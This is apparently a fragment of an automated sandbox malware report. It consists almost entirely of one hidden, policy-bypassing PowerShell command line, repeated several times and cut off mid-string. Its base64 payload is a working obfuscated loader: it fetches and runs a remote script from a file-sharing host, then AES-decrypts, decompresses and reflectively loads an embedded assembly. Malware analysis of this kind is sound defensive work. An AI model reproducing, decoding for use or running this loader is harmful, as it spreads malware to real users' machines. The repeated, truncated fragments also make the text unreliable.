ZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRob